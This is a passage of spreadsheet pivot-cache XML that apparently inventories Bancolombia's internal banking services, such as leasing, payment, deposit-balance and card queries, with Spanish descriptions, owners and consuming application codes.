    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_NU0021001 _x000d__x000a_NU0093001 _x000d__x000a_ISSU20003 _x000d__x000a_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Operacion Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de Consulta Operación Leasing permite a los consumidores obtener la información de las operaciones: Producto, estado, condiciones financieras, condiciones generales de la opción."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Operacion Leasing Financiero"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Operación Leasing Financiero permitirá a los consumidores consultar diferente información relacionada con las operaciones de leasing financiero en estados de anticipo, definitivos o cancelados. "/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago En Efectivo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Pago En Efectivo permitirá obtener información de los pagos, la información podrá ser buscada por pagador o beneficiario, retornando información como tal del pago e información asociada de como se estableció el pago."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1151001 _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago Obligaciones Sufi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de tarea ConsultaPagoObligacionesSufi es una composición entre los servicios de datos del cliente y de la consulta básica de obligaciones, que permite obtener los datos necesarios para que un cliente de Sufi pueda consultar los datos de sus próximos pagos a realizar desde una línea telefónica bajo la tecnología de respuesta de voz interactiva (IVR), este servicio de tarea se hace bajo el contexto del proveedor del Konecta."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="ISSU20003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago Operacion Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de Consulta Pago Operación Leasing permite a los consumidores obtener la información de los pagos realizados para una obligación, sean de Leasing Financiero, Leasing Arrendamiento operativo u otro tipo de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pago Programado"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La Consulta Pagos Programado permitirá visualizar el detalle de una pago programado asociado a un pagador, se obtendra información del convenio, su forma de pago, referencias y su programación. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pagos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaPagos tiene el objetivo de realizar la consulta general y detallada del histórico de lotes de pagos, que ha realizado una empresa afiliada a sus beneficiarios (proveedor o empleado)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Pagos Operacion Leasing Financiero"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Pagos Operación Leasing Financiero permitirá a los consumidores consultar los diferentes pagos: al día, pagos anteriores, pagos futuros o en mora para las operaciones en estado definitiva o en anticipo"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Partner Listas De Control"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La consulta en listas de control para partners, permite a los aliados estratégicos del grupo Bancolombia verificar si un potencial cliente se encuentra reportado en alguna categoría de alerta o bloqueo de listas de control. El consumo de esta capacidad está sujeta previa autorización del equipo jurídico asignado al proyecto que desea consumirlo y siguiendo todo el modelo operativo para APIs partners."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <m/>
    <s v="NU0063001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Plan Pago Operacion Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de Consulta Plan de Pago Operación Leasing permite a los consumidores obtener la información de los planes de pagos acordados para una obligación sean de Leasing Financiero, Leasing Arrendamiento operativo u otro tipo de Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Prestamos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Es un servicio que permite consultar el detalle de un prestamo"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1313001 _x000d__x000a_AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Producto Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá consultar las cuentas asociadas a un cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_ELIBOM _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW0638 _x000d__x000a_BSN _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Producto Tarjetas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá consultar el listado de las tarjetas de crédito de un cliente específico la cual contiene filtros de acuerdo a lo solicitado."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW01065 _x000d__x000a_AW1176 _x000d__x000a_BSN _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Cliente Personas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Servicio permite obtener información detallada de la relación del cliente con sus productos y las personas relacionadas a sus productos(relacionados).   La relación cliente productos devuelve cuales son los productos que un cliente tiene asociado, su porcentaje de participación, la oficina dueña, el tipo de relación que tiene con el producto, etc., agrupado por tipo y número.  Un relacionado es cualquier persona que tenga participación con los productos de un cliente, por ejemplo: un titular, un avalista, un deudor, un cotitular, un beneficiario, etc."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="AW1294001 _x000d__x000a_SVP _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Consolidados"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite a los clientes consultar la información de los siguientes productos: cuentas de depósitos (Ahorros y Corrientes), tarjetas de crédito, préstamos, créditos hipotecarios y CDTs. El nombre de este servicio hace referencia a Productos Consolidados, porque permite al cliente buscar información de casi todos sus productos que se encuentran que tienen en el banco."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="Legacy y MFT"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Del Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permitirá la consulta de información de los productos de un cliente de factoring específico, en varios niveles de detalle."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <s v="Sucursal Virtual_Sucursal Virtual Factoring_AW0422001"/>
    <s v="AW0922 _x000d__x000a_AW0611001 _x000d__x000a_TP _x000d__x000a_Allus _x000d__x000a_AW1294001 _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos InvestBot"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Productos InvestBot permite consular las cuentas depósitos, fondos de inversión colectiva (solo para Valores Bancolombia) y cuentas multiproductos activas de un cliente.  "/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Sitio Transaccional_Sitio Transaccional_AW0638001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Productos Pagos Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá consultar las cuentas asociadas a un cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="BSN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Riesgo Por Cartera"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de consulta riesgo por cartera estará en capacidad de indicar la calificación de cliente y sus obligaciones catalogadas por tipo de cartera. _x000a_La calificación hace referencia a como se ha evaluado el comportamiento de un cliente en el banco, y las obligaciones, son los el detalle de las deudas o productos que tiene con el banco. "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Consolidados"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaSaldosConsolidados proporciona a los consumidores, capacidades para realizar las diferentes transacciones no monetarias sobre las cuentas deposito (Ahorro/Corriente) y plazos fijos."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Consolidados Filiales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Saldos Consolidados Filiales permitirá a los diferentes consumidores poder obtener los saldos consolidados para todos los tipos de productos que posea el cliente en Finacle (CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos) en las diferentes Filiales. El consolidado total de los saldos de todas las Filiales lo tendrá que realizar el consumidor del servicio en caso tal que lo requiera"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Creditos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos LAA: Préstamo retail, CLA: Préstamo corporativo que posee el cliente en las Filiales del exterior. "/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene como objetivo realizar las consultas de los saldos de las cuentas depósitos (Cuenta Ahorro y Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Filiales del Exterior"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1170 _x000d__x000a_AW1165"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="300"/>
    <x v="0"/>
    <s v="El servicio permite consultar el listado de las cuentas (Cuentas de ahorro y Cuentas Corriente) activas de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="NU0017001 _x000d__x000a_AW0856 _x000d__x000a_AW1294001 _x000d__x000a_AW1316001 _x000d__x000a_AW1169 _x000d__x000a_AW1170 _x000d__x000a_NU0014001 _x000d__x000a_AW1165 _x000d__x000a_AW1302001 _x000d__x000a_AW1011 _x000d__x000a_SVE _x000d__x000a_AW1316"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio permite consultar el listado de las cuentas (Cuentas de ahorro y Cuentas Corriente) activas de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="AW1177 _x000d__x000a_AW0638 _x000d__x000a_BSN _x000d__x000a_AW1269001 _x000d__x000a_AW1272001 _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Cuentas Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos: CAA: Cuentas corrientes, SBA: Cuenta de ahorros que posea el cliente en las Filiales del Exterior. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Filiales del Exterior"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Plazos Fijos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este permitirá a los diferentes consumidores poder obtener los diferentes saldos de forma detallada para los tipos de productos TDA: Plazos fijos que posee el cliente en las Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Saldos Productos Consolidados"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Saldos Productos Consolidados permitirá a los diferentes consumidores poder consultar los saldos consolidados para todos los tipos de productos que posea el cliente en Finacle como (CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos). "/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaTarjetasCredito permite consultar la información de tarjetas de crédito, ya sea asociadas a un cliente o por número de tarjeta, donde se podrá retornar información de estados, bloqueos, saldos, deudas y fechas de la tarjeta."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1285001 _x000d__x000a_AW1294001 _x000d__x000a_AW1316001 _x000d__x000a_AW1272001 _x000d__x000a_AW1165 _x000d__x000a_NU0019001 _x000d__x000a_NU0064001 _x000d__x000a_AW1250 _x000d__x000a_NU0103001 _x000d__x000a_AW1316 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Credito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas de crédito, los cuales se listan a continuación.  • Listar tarjetas activas de un cliente (CONSTRUCCION) • Consultar datos de un tarjetahabiente (PRODUCCION) • Consultar los planes de pago de una tarjeta (CONSTRUCCION) • Consultar el detalle de una tarjeta (CONSTRUCCION)• Consultar el código de seguridad de una tarjeta (CONSTRUCCION)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="SAP ERP_FI-AP (Accounts Payable)_AW0541001"/>
    <s v="NU0021001 _x000d__x000a_NU0100001 _x000d__x000a_NU0101001 _x000d__x000a_AW1405001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1316001 _x000d__x000a_AW0955001 _x000d__x000a_AW1184 _x000d__x000a_AW1151001 _x000d__x000a_NU0146001 _x000d__x000a_NU0153001 _x000d__x000a_NU0149001 _x000d__x000a_AW1184003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite realizar las diferentes consultas relacionadas a una tarjeta débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <s v="Konivin - Vennko"/>
    <s v="NU0021001 _x000d__x000a_NU0019001 _x000d__x000a_NU0103001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Debito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas débito, los cuales se listan a continuación. _x000a_• Listar las tarjetas activas de un cliente (PRODUCCION) _x000a_• Listar las tarjetas pendientes por activar (CONSTRUCCION)_x000a_• Listar las tarjetas canceladas (CONSTRUCCION) _x000a_• Consultar datos tarjetahabiente (PRODUCCION)_x000a_• Consultar código de seguridad (CONSTRUCCION)_x000a_• Listar las tarjetas activas de un cliente (PRODUCCION) _x000a_• Listar las tarjetas pendientes por activar (CONSTRUCCION)_x000a_• Listar las tarjetas canceladas (CONSTRUCCION) _x000a_• Consultar datos tarjetahabiente (PRODUCCION)_x000a_• Consultar código de seguridad (CONSTRUCCION)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <s v="FINACLE"/>
    <s v="NU0021001 _x000d__x000a_NU0100001 _x000d__x000a_NU0101001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0104001 _x000d__x000a_AW1184 _x000d__x000a_AW1184003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Del Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio consulta tarjetas del cliente, traerá todas las tarjetas activas que tiene el cliente (Debito, crédito y virtuales), con las condiciones propias del canal de Billetera Móvil._x005f_x000D_ Nota:  Este servicio lo expone un servidor de  Canal Billetera y se expone en IIB10"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1189001 _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas PYME"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaTarjetasPYME permite consultar la información de tarjetas de crédito para PYME. Permite listar las tarjetas PYME de un cliente o consultar los saldos consolidados de las tarjetas asociadas a un cliente PYME."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1176 _x000d__x000a_AW1285001 _x000d__x000a_AW1294001 _x000d__x000a_NU0114001 _x000d__x000a_AW1287"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de ConsultaTasa tiene como objetivo consultar la tasa de la moneda extranjera, filtrando por una moneda origen y una moneda destino."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
